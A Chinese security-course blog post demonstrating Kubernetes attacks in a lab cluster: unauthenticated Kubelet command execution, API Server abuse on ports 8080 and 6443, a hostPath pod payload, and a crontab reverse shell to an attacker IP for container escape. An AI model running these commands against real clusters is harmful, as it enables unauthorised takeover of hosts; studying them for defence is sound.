【第97课】云上攻防-云原生篇&Kubernetes&K8s安全&API&Kubelet未授权访问&容器执行

已于 2024-09-03 11:33:05 修改
阅读量386 收藏 10
点赞数 10
分类专栏: 云上攻防 文章标签: 云原生 kubernetes 安全
于 2024-09-03 10:20:21 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Lucker_YYY/article/details/141854494
版权

免责声明

本文发布的工具和脚本,仅用作测试和学习研究,禁止用于商业用途,不能保证其合法性,准确性,完整性和有效性,请根据情况自行判断。

如果任何单位或个人认为该项目的脚本可能涉嫌侵犯其权利,则应及时通知并提供身份证明,所有权证明,我们将在收到认证文件后删除相关内容。

文中所涉及的技术、思路及工具等相关知识仅供安全为目的的学习使用,任何人不得将其应用于非法用途及盈利等目的,间接使用文章中的任何工具、思路及技术,我方对于由此引起的法律后果概不负责。

知识点

1、云原生-K8s安全-名词架构&各攻击点
2、云原生-K8s安全-Kubelet未授权访问
3、云原生-K8s安全-API Server未授权访问

章节点:
云场景攻防:公有云,私有云,混合云,虚拟化集群,云桌面等
云厂商攻防:阿里云,腾讯云,华为云,亚马云,谷歌云,微软云等
云服务攻防:对象存储,云数据库,弹性计算服务器,VPC&RAM等
云原生攻防:Docker,Kubernetes(k8s),容器逃逸,CI/CD等

K8S集群架构解释

Kubernetes通俗来讲就是用来管理多台主机上的docker容器的一个开源平台应用。

1、Master节点(控制端)
2、Node节点(主机)
3、Pod(容器)

具体参考:云原生kubernetes安全[k8s渗透]_kubernetes dashboard渗透-CSDN博客
在这里插入图片描述

在这里插入图片描述

K8S集群攻击点

随着越来越多企业开始上云的步伐,在攻防演练中常常碰到云相关的场景,例:公有云、私有云、混合云、虚拟化集群等。
以往渗透路径「外网突破->提权->权限维持->信息收集->横向移动->循环收集信息」,直到获得重要目标系统。但随着业务上云以及虚拟化技术的引入改变了这种格局,也打开了新的入侵路径,例如:
1、通过攻击云管理平台(K8S-Master节点),利用管理平台控制所有机器
2、通过docker容器进行逃逸,从而控制宿主机以及横向渗透到K8s Master节点控制所有容器

目前互联网上针对云原生场景下的攻击手法零零散散的较多,仅有一些厂商发布过相关矩阵技术,但没有过多的细节展示,本文基于微软发布的Kubernetes威胁矩阵进行扩展,介绍相关的具体攻击方法。
详细攻击点参考:
https://mp.weixin.qq.com/s/yQoqozJgP8F-ad24xgzIPw
https://mp.weixin.qq.com/s/QEuQa0KVwykrMzOPdgEHMQ

在这里插入图片描述

如何判断对方使用了k8s技术?

扫目标端口来判断
在这里插入图片描述

本地搭建环境测试

搭建环境使用3台Centos 7,参考文章:
centos7安装kubernetes k8s v1.16.0 国内环境 - 简书
centos7 搭建 kubernetes1.16.0 集群_centos the connection to the server localhost:8080-CSDN博客

一个集群包含三个节点,其中包括一个控制节点和两个工作节点

K8s-master 192.168.139.130
K8s-node1 192.168.139.131
K8s-node2 192.168.139.132

在这里插入图片描述
在这里插入图片描述

一、演示案例-云原生-K8s安全-Kubelet(node)未授权访问

攻击10250端口:kubelet未授权访问

在这里插入图片描述
在这里插入图片描述
192.168.230.132配置如下:

/var/lib/kubelet/config.yaml
修改authentication的anonymous为true,
将authorization mode修改为AlwaysAllow,
重启kubelet进程-systemctl restart kubelet

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

利用执行命令这里需要三个参数

namespace:default
pod:test03
container:test03

1、访问获取三个参数值

https://192.168.139.132:10250/runningpods/

在这里插入图片描述

2、执行容器命令:

curl -XPOST -k "https://192.168.139.132:10250/run/<namespace>/<pod>/<container>" -d "cmd=id"

在这里插入图片描述
执行的命令是test03容器里的命令,需要进行容器逃逸。

二、演示案例-云原生-K8s安全-API Server未授权访问

1、攻击8080端口:API Server(Master)未授权访问

旧版本的k8s的API Server默认会开启两个端口:8080和6443。
6443是安全端口,安全端口使用TLS加密;但是8080端口无需认证,
仅用于测试。6443端口需要认证,且有 TLS 保护。(k8s<1.16.0为旧版本)
新版本k8s默认已经不开启8080。需要更改相应的配置

cd /etc/kubernetes/manifests/
- --insecure-port=8080
- --insecure-bind-address=0.0.0.0

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
重启kubelet进程

systemctl restart kubelet

在这里插入图片描述
kubectl官方工具下载地址:安装工具 | Kubernetes

一、获取所有主机(nodes)节点
kubectl.exe -s 192.168.139.130:8080 get nodes

在这里插入图片描述

二、获取所有容器(pods)节点
kubectl.exe -s 192.168.139.130:8080 get pods

在这里插入图片描述

三、创建新的docker容器
kubectl -s 192.168.139.130:8080 create -f xiaodi.yaml 
//创建一个pod文件,相当于新建一个名为xiaodi的docker容器

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

四、进入到创建的docker容器
kubectl -s 192.168.139.130:8080 --namespace=default exec -it xiaodi bash 
//docker进入到xiaodi容器的命令

在这里插入图片描述

五、容器逃逸获取宿主机shell
echo -e "* * * * * root bash -i >& /dev/tcp/192.168.139.128/4444 0>&1\n" >> /mnt/etc/crontab
把反弹shell命令写进宿主机的计划任务里,那么反弹的shell就是宿主机的shell了

在这里插入图片描述
等待一会就会收到反弹,但是收到的反弹shell不是master控制端的shell,而是下面的某个node(主机)节点的shell
在这里插入图片描述
在这里插入图片描述

2、攻击6443端口:API Server(Master)未授权访问

在这里插入图片描述

一些集群由于鉴权配置不当,将"system:anonymous"用户绑定到"cluster-admin"用户组,从而使6443端口允许匿名用户以管理员权限向集群内部下发指令。
kubectl create clusterrolebinding system:anonymous   --clusterrole=cluster-admin   --user=system:anonymous
一、创建恶意pods容器
https://192.168.139.130:6443/api/v1/namespaces/default/pods/

POST:{"apiVersion":"v1","kind":"Pod","metadata":{"annotations":{"kubectl.kubernetes.io/last-applied-configuration":"{\"apiVersion\":\"v1\",\"kind\":\"Pod\",\"metadata\":{\"annotations\":{},\"name\":\"test02\",\"namespace\":\"default\"},\"spec\":{\"containers\":[{\"image\":\"nginx:1.14.2\",\"name\":\"test02\",\"volumeMounts\":[{\"mountPath\":\"/host\",\"name\":\"host\"}]}],\"volumes\":[{\"hostPath\":{\"path\":\"/\",\"type\":\"Directory\"},\"name\":\"host\"}]}}\n"},"name":"test02","namespace":"default"},"spec":{"containers":[{"image":"nginx:1.14.2","name":"test02","volumeMounts":[{"mountPath":"/host","name":"host"}]}],"volumes":[{"hostPath":{"path":"/","type":"Directory"},"name":"host"}]}}

在这里插入图片描述

二、连接查看pods
kubectl --insecure-skip-tls-verify -s https://192.168.139.130:6443 get pods

在这里插入图片描述

三、进入到test03容器里并反弹宿主机的shell
kubectl --insecure-skip-tls-verify -s https://192.168.139.130:6443 --namespace=default exec -it test03 bash

在这里插入图片描述

echo -e "* * * * * root bash -i >& /dev/tcp/192.168.139.128/4444 0>&1\n" >> /mnt/etc/crontab
把反弹shell命令写进宿主机的计划任务里,那么反弹的shell就是宿主机的shell了

等待一会就会收到反弹,但是收到的反弹shell不是master控制端的shell,而是下面的某个node(主机)节点的shell
在这里插入图片描述
在这里插入图片描述

Lucker_YYY
关注
  • 10
    点赞
  • 10
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
API攻防-接口安全&WebPack&REST&SOAP&WSDL&WebService
m0_61506558的博客
12-22 682
简单对象访问协议是交换数据的一种协议规范,是一种轻量的、简单的、基于XML(标准通用标记语言下的一个子集)的协议,它被设计成在WEB上交换结构化的和固化的信息。SOAP不是WebService的专有协议。 SOAP使用HTTP来发送XML格式的数据,可以简单理解为:SOAP=HTTP+XML
服务攻防-中间件安全&CVE 复现&K8s&Docker&Jetty&Websphere
m0_61506558的博客
12-20 727
Docker容器是使用沙盒机制,是单独的系统,理论上是很安全的,通过利用某种手段,再结合执行POC或EXP,就可以返回一个宿主机的高权限Shell,并拿到宿主机的root权限,可以直接操作宿主机文件。它从容器中逃了出来,因此我们形象的称为Docker逃逸漏洞
云上攻防-云原生&Kubernetes&K8s安全&API&Kubelet授权访问&容器执行
siu~
03-03 1588
1、云原生-K8s安全-名词架构&各攻击点 2、云原生-K8s安全-Kubelet授权访问 3、云原生-K8s安全-API Server授权访问
Day97云上攻防-云原生&Kubernetes&K8s安全&API&Kubelet授权访问&容器执行
qq_61553520的博客
04-12 1493
小迪安全-Day97云上攻防-云原生&Kubernetes&K8s安全&API&Kubelet授权访问&容器执行
云上攻防-云原生&amp;Kubernetes&amp;K8s安全&amp;API&amp;Kubelet授权访问&amp;容器执行
2401_84254364的博客
05-04 808
一个集群包含三个节点,其中包括一个控制节点和两个工作节点。
云上攻防-云原生&amp;Kubernetes&amp;K8s安全&amp;API&amp;Kubelet授权访问&amp;容器执行(1)
04-16 1097
Python编程学习,学习内容包含:语法、正则、文件、 网络、多线程等常用库,推荐《Python核心编程》,不要看完;在实际的渗透测试过程中,面对复杂多变的网络环境,当常用工具不能满足实际需求的时候,往往需要对现有工具进行扩展,或者编写符合我们要求的工具、自动化脚本,这个时候就需要具备一定的编程能力。恭喜你,如果学到这里,你基本可以从事一份网络安全相关的工作,比如渗透测试、Web 渗透、安全服务、安全分析等岗位;③漏洞扫描、漏洞利用、原理,利用方法、工具(MSF)、绕过IDS和反病毒侦察。
云上攻防-云原生&K8s安全&Config泄漏&Etcd存储&Dashboard鉴权&Proxy暴露
siu~
03-06 1386
1、云原生-K8s安全-etcd授权访问 2、云原生-K8s安全-Dashboard授权访问 3、云原生-K8s安全-Configfile鉴权文件泄漏 4、云原生-K8s安全-Kubectl Proxy不安全配置
红队攻防渗透技术实战流程:云安全云原生安全K8s搭建及节点漏洞利用
HACKONE的博客
05-21 601
Kubernetes是一个开源的,用于编排云平台中多个主机上的容器化的应用,目标是让部署容器化的应用能简单并且高效的使用, 提供了应用部署,规划,更新,维护的一种机制。其核心的特点就是能够自主的管理容器来保证云平台中的容器按照用户的期望状态运行着,管理员可以加载一个微型服务,让规划器来找到合适的位置,同时,Kubernetes在系统提升工具以及人性化方面,让用户能够方便的部署自己的应用。随着越来越多企业开始上云的步伐,在攻防演练中常常碰到云相关的场景,例:公有云、私有云、混合云、虚拟化集群等。
云原生安全攻防》-- K8s集群安全风险分析
03-29 650
在这个数字化快速发展的年代,云原生安全变得越来越重要。我明白对于很多朋友来说,这是一个既新奇又复杂的领域。因此,我整合了以往的专业积累,精心打造了一个专门讲解云原生安全的系列程,目的是能给大家带来有价值的知识解析。为了让每位朋友都能找到适合自己的学习方式,同时支持程能持续地更新下去,我决定这样安排程内容和形式:免费版:通过采用图文形式简洁明了地概述每个程的关键知识点,适合快速获取云原生安全...
云原生周刊:LitmusChaos 审计完成|2024.9.2
KubeSphere
09-02 480
文章详细讲解了如何配置 Istio 与 OPA 的集成,包括使用 OPA 定义授权策略,以及如何在 Istio 中应用这些策略,以实现细粒度的访问控制和安全管理。文章首先介绍了测试环境和方法,包括创建测试用例以评估库的响应时间和吞吐量。审计报告强调,尽管发现了数量和严重性不等的问题,LitmusChaos 的安全措施实施良好,反映了项目的功能、构建和维护。最后,文章总结了选择合适库的建议,指出如果主要任务涉及 Kubernetes 操作,使用 Kubernetes 客户端库将更有利于性能和功能的优化。
zabbix和prometheus介绍;云原生
2301_80702576的博客
08-29 1276
云原生应用是面向“云”而设计的应用,通过使用云原生技术,开发者无需考虑底层的技术实现,可以充分发挥云平台的弹性和分布式优势,实现快速部署、按需伸缩、不停机交付等功能。
云原生存储Rook部署Ceph
henanchenxuyuan的博客
09-02 1006
Rook 是一款云原生存储编排服务工具,Ceph 是一种广泛使用的开源分布式存储方案,通过Rook 可以大大简化 ceph 在 Kubernetes 集群中的部署和维护工作。Rook 由云原生计算基金会( CNCF )孵化,且于 2020 年 10 月正式进入毕业阶段。Rook 并不直接提供数据存储方案,而是集成了各种存储解决方案,并提供一种自管理、自扩容、自修复的云原生存储服务。
零基础5分钟上手亚马逊云科技-开发云原生网站应用
最新发布
m0_66628975的博客
09-02 859
亚马逊云科技 Lambda 是一项无服务器计算服务,专为帮助开发者运行代码而无需管理服务器基础设施而设计。通过 Lambda,开发者可以在不需要配置或维护服务器的情况下,自动运行代码以响应各种事件触发,如对 S3 存储桶的更改、API Gateway 请求、或数据库更新等。Lambda 支持多种编程语言,允许开发者只需上传代码并定义触发条件,AWS 会自动处理所有底层资源的管理,如计算资源的分配、扩展和监控。这个高度自动化的服务使得开发和部署变得更加简便和高效。
Kubernetes部署】二进制搭建K8s高可用集群1.26.15版本(超详细,可跟做)
秦子腾
08-30 1535
kube-scheduler,负责将 Pods 调度到合适的节点上,根据预定义的策略和资源的可用性,选择最适合的节点以运行 Pod,kube-scheduler 会考虑各种因素,如节点资源、Pod 需求、亲和性和反亲和性规则等,确保 Pod 在集群中均匀地分布并满足性能需求。提示:在master-1、master-2、master-3中部署组件,证书和配置的可以先在其中一台生成,然后拷贝到其他master主机中。1、创建etcd目录(master-1、master-2、master-3中都要先创建)
kubeadm部署 Kubernetes(k8s) 高可用集群【V1.20 】
srebro | 博客
09-01 1515
kubeadm是官方社区推出的一个用于快速部署kubernetes集群的工具。
k8s系列】Kubernetes Service 深度解析:从基础到实战
Young_深情不及里子的博客
09-02 715
在当今的云原生世界中,Kubernetes 已经成为容器编排和管理的事实标准。它提供了一种强大的方式来部署、扩展和管理容器化应用。然而,随着应用规模的扩大和复杂性的增加,如何有效地暴露和管理这些应用的网络服务成为了一个关键问题。Kubernetes Service 正是解决这一问题的利器。本文将分享一些笔者在这块的知识点学习过程,便于感兴趣的小伙伴可以快速理解Kubernetes组件的基础应用。
K8s系列之:Operator 和 Operator Framework
zhengzaifeidelushang的博客
09-02 692
Operator 是 CRD 配合 可选的 webhook 和 controller,在 Kubernetes 体系下扩展用户业务逻辑的一套机制;kubebuilder 是社区认可度很高的一种官方、标准化 Operator 框架;按照上文实战步骤,填充用户自定义代码,就可以很方便的实现一个 Operator。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值